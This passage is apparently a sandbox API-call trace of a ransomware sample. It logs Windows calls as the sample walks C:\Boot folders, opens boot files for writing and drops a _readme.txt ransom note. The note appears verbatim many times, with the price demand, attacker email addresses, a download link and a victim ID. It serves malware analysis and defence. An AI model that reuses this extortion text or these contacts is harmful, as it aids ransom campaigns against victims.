ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.995] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.995] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.996] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.996] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.996] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0227.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.996] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0227.997] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0227.997] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.997] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.997] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.997] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.998] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0227.999] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.999] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.999] PathFindFileNameW (pszPath="") returned="" [0227.999] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.999] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.999] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.999] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0228.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.000] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0228.000] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0228.000] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.000] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.000] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0228.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0228.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0228.001] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.001] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.001] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.001] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0228.001] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0228.001] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.001] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0228.002] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.002] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 